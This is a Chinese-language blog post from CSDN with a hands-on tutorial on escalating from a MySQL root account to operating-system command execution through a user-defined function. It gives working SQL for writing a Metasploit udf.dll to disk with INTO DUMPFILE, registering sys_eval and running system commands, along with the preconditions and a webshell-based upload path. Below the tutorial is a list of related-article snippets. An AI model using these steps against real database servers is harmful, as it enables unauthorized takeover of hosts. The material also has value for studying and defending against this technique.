利用 mysql ufd 进行系统提权

最新推荐文章于 2024-11-01 14:31:36 发布
最新推荐文章于 2024-11-01 14:31:36 发布
阅读量730 收藏
点赞数
分类专栏: 内网安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35208730/article/details/120257493
版权

MySQL UDF 用户自定义函数 提权 系统命令
关键词由CSDN通过智能技术生成

UFD 介绍

user defined function,即用户自定义函数。是通过添加新函数,对MYSQL的功能进行扩充,性质就像使用本地MYSQL函数如abs()concat()。udf文件后缀为.dll,常用c语言编写。

  • 在mysql 5.1 以后的版本中,udf文件放在于mysql/lib/plugin目录下,目录默认是不存在的,需要使用 webshell 找到 mysql 的安装目录,并在安装目录下创建 lib\plugin 文件夹,然后将 udf.dll文件导出到该目录。

    以下这种通过文件流的机制创建目录的方法经尝试不可行,提示不允许操作。(路过的大佬指导一下~)

    select 'xxxxxx' into dumpfile 'C:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin::$INDEX_ALLOCATION';

  • 如果mysql版本小于5.1, udf文件在windows 7下放置在C:\windows目录,在windows server 2003下放置于C:\windows\system32目录,在windows server 2000下放置在C:\winnt\system32目录。

前提

  1. 需要mysql root权限的账户,因为需要用 create 操作
  2. 根据 mysql 版本确定plugin_dir目录
  3. mysql配置文件配置项secure_file_priv=置空,表示不限制导入导出目录(mysql5.5 之前 secure_file_priv 默认是空)
  4. 如果是mysql 5.1之后的版本,目前来说必须存在lib\plugin\目录

提权

环境信息:windows 7,mysql 5.0.96

  1. 通过 root 账户登录到 mysql 后,获取一些变量信息,看是否满足前提条件

    select version(); # 查看mysql版本
select @@plugin_dir # 查看plugin文件夹路径,5.1版本之后有效,如果是5.1之前版本会报错,按系统默认的来
show global variables like 'secure%'; # secure_file_priv 变量必须为空,5.1一上版本需要在my.ini文件的[mysqld]下增加配置 secure_file_priv=

    image-20210912163343100

  2. 从 MSF 中获取利用的 udf.dll 文件,目录/usr/share/metasploit-framework/data/exploits/mysql;或者从 sqlmap 中取,目录/usr/share/sqlmap/data/udf/mysql

    建议用MSF下的udf文件,sqlmap下的是经过编码的,如果要用需要先解码
    image-20210912164347363

  3. 通过 webshell 将 udf.dll 上传到C:\windows目录下,或者通过 sqlshell 写进去(udf.dll是自己改的名字,不改也行,下面命令中用到的文件名和这里对应就行)

    CREATE TABLE udftmp (c blob); //新建一个表,名为udftmp,用于存放本地传来的udf文件的内容。
INSERT INTO udftmp values(unhex('udf文件的16进制格式')); //在udftmp中写入udf文件内容
SELECT c FROM udftmp INTO DUMPFILE 'C:\\windows\\udf.dll'; //将udf文件内容传入新建的udf文件中,路径根据自己的@@basedir修改

  4. 创建自定义函数,并执行系统命令

    CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll'; # 导入自定义函数
select sys_eval('whoami');
DROP FUNCTION sys_eval; # 删除自定义函数

    image-20210912145729126

分等级考试的佛
关注
专栏目录
网络安全系列&网安实践系列:利用MSF对MYSQL进行简单的UDF提权
weixin_54626591的博客
10-23 26
利用MSF对MYSQL进行简单的UDF提权
Mysql数据库提权——UDF提权
cxrpty的博客
03-11 1946
实验原理:UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数(其中包括了执行系统命令的函数),要想利用udf, 必须上传udf.dll作为udf的执行库,mysql中支持UDF扩展 ,使得我们可以调用DLL里面的函数来实现一些特殊的功能 实验条件 :1.具有mysql的root权限,且mysql以system权限运行 ...
MySQL UDF提权
m0_68636078的博客
09-22 1117
自用
MySQL UDF提权原理
weixin_45626840的博客
10-10 925
看了许多视频和文章,对UDF提权讲得都不是很清楚,遂搜索了一下MySQL的基础知识,总结了一下,供各位初学的师傅参考。user-defined functions (UDFs),用户自定义函数,不过,这已经是过时的说法了,MySQL官方文档现在把它称作(可加载函数),是MySQL可在运行时加载执行以扩展功能的机制。我们大可把它理解为是一个插件,而且其本质也是一个动态链接库。官方文档很清楚地说明了,一个可加载函数会被编译为库文件(Windows下文.dll,Linux下为.so),然后使用和。
MySQL提权
热门推荐
Grey的博客
05-12 3万+
一、Mysql提权必备条件1.服务器安装Mysql数据库利用Mysql提权的前提就是服务器安装了mysql数据库,且mysql的服务没有降权,Mysql数据库默认安装是以系统权限继承的,并且需要获取Mysql root账号密码。2.判断Mysql服务运行权限对于Mysql数据库服务运行权限有很多方法,我这里主要介绍三种,一种是通过查看系统账号,也即使用“net user”命令查看系统当前账号,如果...
mysql创两个表主键相同,mysql表中的多个外键与相同的主键
weixin_36081891的博客
01-18 775
I have a table user with userID as the primary key. I have another table called Friends. In the Friends table, I have two Users as friends represented by the columns UserID and FrndID where both UserI...
MySQL之UDF提权复现
未完成的歌~的博客
09-03 1052
UDF(Userfined function)用户自定义函数,是MySQL的一个扩展接口,用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用。
sqlmap mysql udf提权_利用SQLMAP获取os-shell的过程分析「UDF提权
weixin_33089993的博客
02-04 1456
结论关于MySQL读写文件的条件限制是老生常谈的问题,由于SQLMAP获取os-shell的两种方法均需要文件写入操作,这里先摆出结论:1、MySQL服务默认以mysql用户权限启动,并没有危险目录(/usr/lib64/mysql/plugin[root 755]、/var/www/html[root 755]、/var/spool/cron[root 700]、/root/.ssh[root ...
Ufd.rar_UFD_update
09-23
【标题】"Ufd.rar_UFD_update" 指的是一个名为 "UFD" 的软件或库的更新压缩包。UFD 可能是“通用闪存驱动器”(Universal Flash Drive)的缩写,或者它可能代表某种特定的开发工具或程序。"Update Files Date" 表明...
Dr.UFD(M0816).rar_Dr.UFD_FOE
09-24
3. 使用教程:如果"Dr.UFD"包含复杂的操作步骤,用户应参考"readme.txt"或其他官方文档进行学习,避免误操作。 4. 更新维护:定期检查软件更新,保持软件版本的最新,以获得最佳的性能和最新的功能。 总的来说,"Dr...
SQL的三种执行方式
Fresh_man888的博客
12-11 1795
第一种: 逐行执行,SQL就是调用select,然后在select中传函数(UFD输入一行返回一行),对于RDD,就是调用底层new MapPartitionsRDD,不论是SQL还是RDD都不需要shuffle 第二种: 分组执行: select gender, avg(age), count(*) from tb_student group by gender SQL就是调用Select,必须要求Select的字段要么在聚合函数里面SUM(meney),要么在group by...
mysql函数扩展之UDF开发
AlbertS Home of Technology
11-18 3915
前言一开始接触到UDF是在目前开发的项目中,在项目的存储过程中接触到了这样一条sql语句:CREATE FUNCTION XXXXX RETURNS INTEGER SONAME "YYYYY.so";存储过程的名字叫做CreateUDF,当时看到这条语句很迷惑,根本不知道是做什么用的,只能在项目资源中查找YYYYY.so这个库文件,结果却什么也没有找到,一番努力之后我断定,项目中调用CreateU
mysql的udf功能_mySql的UDF是什么
weixin_39580041的博客
01-18 790
CRUD:添删改查UDF是mysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段。1 MySQL简介MySQL是最流行的开放源码SQL数据库管理系统,相对于Oracle,DB2等大型数据库系统MySQL由于其开源性、易用性、稳定性等特点,受到个人使用者、中小型企业甚至一些大型企业的广泛欢迎,MySQL具有以下特点:l...
【Linux】MySQLMGR主从复制
Stringzhua的博客
10-30 819
MySQL是⽬前最流⾏的开源关系型数据库,国内⾦融⾏业也开始全⾯使⽤,其中MySQL5.7.17提出的 MGR(MySQL Group Replication)既可以很好的保证数据⼀致性⼜可以⾃动切换,具备故障检测功能、 ⽀持多节点写⼊,MGR是⼀项被普遍看好的技术。MGR(MySQL Group Replication)是MVSQL⾃带的⼀个插件,可以灵活部署。
easy-es使用以及Es和MySQL同步
weixin_51918722的博客
10-31 425
它主要就是简化了ES相关的API, 使用起来像MP一样舒服。
MySql】第五章(存储函数与存储过程)习题
最新发布
她是不会无条件的!!
11-01 440
MySql】第五章(存储函数与存储过程)习题
mysql 8.0.39 Caused by: java.sql.SQLException: Illegal mix of collations 异常解决
LFCuiYs的博客
10-30 378
发现设置utf8mb3_general_ci 会报错,所以要与参数一直 改成utf8mb4_general_ci 即可生效。java服务可以正常启动,页面发现查询报错Illegal mix of collations。经查看发现是关联表排序异常,因是mysql 8.0.39。然后定位异常 调成一直参数问题解决。
MySQL常用sql语句
yangyang3401的博客
10-29 282
mysql基本操作
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值